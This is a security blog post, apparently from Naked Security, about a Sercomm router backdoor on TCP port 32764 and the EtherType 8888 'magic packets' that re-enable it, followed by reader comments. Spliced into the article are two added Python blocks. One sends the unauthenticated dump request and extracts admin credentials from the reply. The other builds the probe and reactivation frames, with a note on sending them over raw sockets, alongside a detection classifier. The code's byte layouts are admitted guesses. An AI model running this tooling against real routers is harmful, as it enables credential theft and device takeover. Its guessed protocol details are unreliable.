The SoHo router backdoor that was "fixed" by hiding it behind another backdoor

Filed Under: Featured, Security threats, Vulnerability

Over the Christmas break at the end of 2013, French hacker Eloi Vanderbeken decided to see if he could break into his own Netgear router.

He wanted to tweak some of the performance settings, but realised he'd forgotten the password, and hacking his way in seemed more fun than doing a hardware reset and starting from scratch.

Long story short, Vanderbeken found his way in.

Turns out there was a service listening on TCP port 32764 (mercifully only on the internal interface by default, not on the internet side!) that could be instructed, without authentication, to dump the router's configuration.

Including the admin username and password.

All he had to do was to send the text ScMM (short for SerComm, the original equipment manufacturer), followed by a command number (1 to dump the configuration), followed by a length field of zero (meaning "I have no further data to send").
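The exchange just described, as an added example: this is not code from the article or from Vanderbeken's own proof-of-concept. It builds the request, parses a reply, and pulls the admin credentials out of a configuration dump. Everything beyond the page's description is an assumption: the header is taken to be the 4-byte magic followed by two 4-byte little-endian integers (command, then payload length), with the reply using the same layout and a status code in place of the command; on little-endian firmware the 32-bit magic 0x53634D4D therefore appears on the wire as MMcS rather than ScMM, so the parser accepts both; and the key=value layout and key names of the dump are invented for illustration.

```python
"""Build and parse the 'ScMM' messages of the TCP/32764 backdoor.

Added example, not the article's or Vanderbeken's code. Assumptions:
  * header = 4-byte magic, then two 4-byte little-endian unsigned ints
    (command for a request, status for a reply; then payload length);
  * little-endian firmware sends the magic as b"MMcS", so both orders
    are accepted when parsing;
  * the config dump is "key=value" lines; the key names below are
    constructed for illustration, real firmware differs by model.
"""
import socket
import struct

MAGIC_BIG = b"ScMM"
MAGIC_LITTLE = b"MMcS"
CMD_DUMP_CONFIG = 1              # command 1: dump the configuration
HEADER = struct.Struct("<4sII")  # magic, command/status, payload length
PORT = 32764


def build_request(cmd: int, payload: bytes = b"", magic: bytes = MAGIC_BIG) -> bytes:
    """Header (plus optional payload) as the backdoor service expects it.
    A zero length field says "no further data follows"."""
    return HEADER.pack(magic, cmd, len(payload)) + payload


def parse_message(data: bytes) -> tuple:
    """Split a backdoor message into (code, payload).
    Raises ValueError on bad magic or a payload shorter than advertised."""
    if len(data) < HEADER.size:
        raise ValueError("short header")
    magic, code, length = HEADER.unpack_from(data)
    if magic not in (MAGIC_BIG, MAGIC_LITTLE):
        raise ValueError("bad magic %r" % magic)
    payload = data[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return code, payload


def parse_config(dump: bytes) -> dict:
    """Turn a key=value dump into a dict; lines without '=' are ignored."""
    cfg = {}
    for line in dump.decode("latin-1").splitlines():
        key, sep, value = line.partition("=")
        if sep:
            cfg[key.strip()] = value.strip()
    return cfg


def admin_credentials(cfg: dict) -> tuple:
    """Web admin username/password from a parsed dump.
    The key names are an assumption, not taken from the page."""
    return cfg.get("http_username"), cfg.get("http_passwd")


def probe(host: str, port: int = PORT, timeout: float = 3.0) -> bytes:
    """Live check for a router on your own LAN: send a dump request and
    return the raw reply (empty bytes if the port is closed or silent).
    Deliberately not exercised by the offline demo below."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request(CMD_DUMP_CONFIG))
            chunks = []
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
            return b"".join(chunks)
    except OSError:
        return b""


# Constructed reply standing in for a vulnerable router (not a real capture).
SAMPLE_DUMP = b"http_username=admin\nhttp_passwd=hunter2\nwan_proto=dhcp\n"
SAMPLE_REPLY = HEADER.pack(MAGIC_LITTLE, 0, len(SAMPLE_DUMP)) + SAMPLE_DUMP

if __name__ == "__main__":
    print("request :", build_request(CMD_DUMP_CONFIG).hex())
    status, body = parse_message(SAMPLE_REPLY)
    print("status  :", status)
    print("admin   :", admin_credentials(parse_config(body)))
```

Feed `probe()` the reply of a router you own and `parse_message()` will either raise (the port answered with something that isn't this protocol) or hand you the dump; a closed port returns empty bytes, which is the result you want to see after the vendor's patch.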

Even if a backdoor like this is only accessible to users who are already on your network, it's still a giant security hole.

It means, for example, that any duplicitous guests to whom you grant internet access can surreptitiously get into your router and mess with the settings, including opening up the backdoor on the internet interface so they can get back in later.

The vendor therefore came out with a patch, closing the listening port and with it the backdoor.

That got Vanderbeken thinking, "How serious was the patch?"

After all, if the original purpose of the backdoor was to make it easier for the vendor's own management software to interact with the router, a patch that closed the backdoor altogether would necessitate wholesale changes to the management software, too.

Another long story short, Vanderbeken found that the backdoor was still there [PDF], just turned off by default.

He discovered that you could re-enable it by sending the router a so-called "magic ethernet packet."

→ If you've ever used a feature called Wake-on-LAN, you've used a "magic packet": it's an ethernet frame that acts as a signal, rather than carrying data, telling a network card to power up the computer in which it's installed. Wake-on-LAN can be very handy. You can leave your computers turned off at night to save power, and rely on the network card alone to let you activate the computer remotely if required, for example to install security updates.

Greatly simplified, Ethernet frames start with the six-byte MAC address (network card ID) of the destination device; the six-byte MAC address of the source device; and a two-byte EtherType identifier that says what kind of data follows.

Example EtherTypes are 0800 for an IPv4 packet, 86DD for an IPv6 packet, 0806 for ARP (address resolution protocol), and 0842 for Wake-on-LAN.

Sercomm routers, or at least Vanderbeken's Sercomm router, also look out for EtherType 8888 "magic packets", which act as another backdoor.

Vanderbeken found that if he sent his router an 8888-type packet containing the number 0x0201 (effectively a command identifier) and the MD5 checksum of the string DGN1000, corresponding to his router's model number, then...

...the original backdoor listening on port 32764 was reactivated!

And if you don't know whether there are any vulnerable routers on the current LAN segment, Vanderbeken also found that sending a broadcast 8888 packet with command number 0x0200 would provoke the router into replying, allowing a would-be attacker on the LAN to find out automatically if there are any exploitable routers in range.
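The frames described above, as an added example that is not part of the original article and not Vanderbeken's code: it builds Wake-on-LAN and 8888 frames, and classifies captured frames the way a LAN monitor would, flagging the 0x0200 probe and the 0x0201 reactivation (and whether the MD5 in the latter matches a model string you know about). Beyond what the page states, it assumes a plain 14-byte Ethernet II header, a 2-byte big-endian command at the start of the 8888 payload, and the 16 raw MD5 bytes of the model string directly after the 0x0201 command; the page does not say whether the real firmware wants raw bytes or hex text, so treat that layout as an assumption. The MAC addresses and frames are constructed, not captured.

```python
"""EtherType 0x8888 'magic packets' and Wake-on-LAN frames.

Added example, not the article's or Vanderbeken's code. Assumptions:
14-byte Ethernet II header; 8888 payload = 2-byte big-endian command,
then (for 0x0201) the 16 raw MD5 bytes of the model string.
"""
import hashlib
import struct

ETH_IPV4, ETH_ARP, ETH_IPV6 = 0x0800, 0x0806, 0x86DD
ETH_WOL, ETH_SERCOMM = 0x0842, 0x8888
CMD_PROBE, CMD_REACTIVATE = 0x0200, 0x0201
BROADCAST = b"\xff" * 6


def mac(text: str) -> bytes:
    """'02:00:00:00:00:01' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    """Ethernet II: dst MAC, src MAC, big-endian EtherType, payload."""
    return dst + src + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes) -> tuple:
    """-> (dst, src, ethertype, payload); raises ValueError if too short."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    (ethertype,) = struct.unpack("!H", frame[12:14])
    return frame[:6], frame[6:12], ethertype, frame[14:]


def wol_payload(target: bytes) -> bytes:
    """Wake-on-LAN magic packet: six 0xFF bytes, then the MAC 16 times."""
    return b"\xff" * 6 + target * 16


def sercomm_payload(cmd: int, model: str = "") -> bytes:
    """0x0200 probe carries only the command; 0x0201 adds MD5(model)."""
    body = struct.pack("!H", cmd)
    if cmd == CMD_REACTIVATE:
        body += hashlib.md5(model.encode()).digest()
    return body


def classify(frame: bytes, known_models=("DGN1000",)) -> str:
    """Label one frame for a LAN monitor: 'wol', 'probe',
    'reactivate:<model>', 'reactivate:unknown-model', 'sercomm-other'
    or 'other'. Anything starting with 'probe'/'reactivate' is an alert."""
    _, _, ethertype, payload = parse_frame(frame)
    if ethertype == ETH_WOL:
        return "wol"
    if ethertype != ETH_SERCOMM:
        return "other"
    if len(payload) < 2:
        return "sercomm-other"
    (cmd,) = struct.unpack("!H", payload[:2])
    if cmd == CMD_PROBE:
        return "probe"
    if cmd == CMD_REACTIVATE:
        digest = payload[2:18]
        for model in known_models:
            if hashlib.md5(model.encode()).digest() == digest:
                return "reactivate:" + model
        return "reactivate:unknown-model"
    return "sercomm-other"


def scan(frames) -> list:
    return [classify(f) for f in frames]


# Constructed sample traffic (locally administered MACs, not a capture).
ATTACKER = mac("02:00:00:00:00:01")
ROUTER = mac("02:00:00:00:00:02")
FRAMES = [
    build_frame(BROADCAST, ATTACKER, ETH_WOL, wol_payload(ROUTER)),
    build_frame(ROUTER, ATTACKER, ETH_ARP, b"\x00\x01\x08\x00\x06\x04\x00\x01" + bytes(20)),
    build_frame(BROADCAST, ATTACKER, ETH_SERCOMM, sercomm_payload(CMD_PROBE)),
    build_frame(ROUTER, ATTACKER, ETH_SERCOMM, sercomm_payload(CMD_REACTIVATE, "DGN1000")),
    build_frame(ROUTER, ATTACKER, ETH_SERCOMM, sercomm_payload(CMD_REACTIVATE, "DGN2200")),
]

if __name__ == "__main__":
    for frame, label in zip(FRAMES, scan(FRAMES)):
        print("%04x %-26s %s" % (parse_frame(frame)[2], label, frame[14:20].hex()))
```

On Linux a `socket.socket(socket.AF_PACKET, socket.SOCK_RAW)` bound to the interface will transmit what `build_frame()` returns (root needed), and the same socket type, or a pcap capture, feeds `classify()`. Note that the monitor only needs to see EtherType 8888 at all to be suspicious: nothing legitimate on a home LAN sends it.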

What to do?

Short of decompiling your router's firmware, like Vanderbeken did, it's hard to tell whether your vendor has left behind a security hole of this sort.

Even if you suspect your router has this very same "magic packet" hole, you can't easily tell which model identifier string the firmware feeds into the MD5 checksum that validates the magic packets, so you can't reliably test for it from the outside.

So we'll simply repeat the advice we gave last time.

If you're technically inclined, or have a friend or family member who is and can help you, you might want to see if your router can run an open source firmware such as OpenWRT or DD-WRT.

Those are Linux-based firmware builds for low-end routers that are much more modular than most of the firmware downloads from router vendors, meaning that you can leave out the bits you don't need.

They also receive regular security patches, thanks to the care and attention of the developer communities that have sprung up around them.

And if you are ready to go a bit more high-end than a SoHo router, you might want to grab a copy of Sophos's award-winning UTM product, which you can run entirely for free at home.


6 Responses to The SoHo router backdoor that was "fixed" by hiding it behind another backdoor

  1. shane · 183 days ago

    nice article.... However the dd-wrt site has been up and down like a yo yo.
    Don't get me wrong. I have been donating to that crazy hair guy for years...

    • Paul Ducklin · 182 days ago

      Site has always worked for me (though I am more of an OpenWRT man myself).

      As for "crazy hair," wouldn't "hair that's a bit 1980s" be a fairer way to put it? Not sure what he looks like today, but we can let other readers decide. Here is the chap to whom you allude (Sebastian Gottschall of DD-WRT), a few years ago:

      http://www.tomsnetworking.de/aktuelles/news_beitrag/news/4005/index.html

      • Steve-o · 182 days ago

        Thanks to Paul's link, I can second Shane's opinion. That is Crazy Hair! And, in my own opinion, I kind of like it.

  2. David Attard · 183 days ago

    And what guarantees that OpenWRT doesn't have a Heartbleed type of bug?

    It's obviously a rhetorical question - point being, I don't think we can ever eliminate all the risks associated with whatever version of software we use ...

    • Guy · 183 days ago

      Surely it would be good practice to just boycott ANY hardware vendor that would consider putting backdoors into its products?

      What gets me is not whether it was technically patched, but the willingness of the vendor to deliberately create a way to violate my privacy.

      • Paul Ducklin · 182 days ago

        Wonder if they even thought of it as a "backdoor"? Did the product vendor even know it was there, or did it just "come free with the firmware"?

        Many people are dreadfully concerned about backdoors that may or may not be in products "because the NSA made the vendor do it." In a way, that actually unsettles me a lot less than this sort of thing. At least in the case of an NSA backdoor (real or imagined), there would be some purpose, some intention, some planning, heck, even if it were kept super-secret, there'd be *some* documentation somewhere.

        But there is a sort of parallel universe of backdoors and security holes that exist entirely because of a "who cares...she'll be right" attitude.

        In other words, if deliberate willingness to violate your privacy is a bad thing (and it is), how much worse is violating your privacy entirely on account of what you might call a "giant unconcerned shrug"?


About the author

Paul Ducklin is a passionate security proselytiser. (That's like an evangelist, but more so!) He lives and breathes computer security, and would be happy for you to do so, too. Paul won the inaugural AusCERT Director's Award for Individual Excellence in Computer Security in 2009. Follow him on Twitter: @duckblog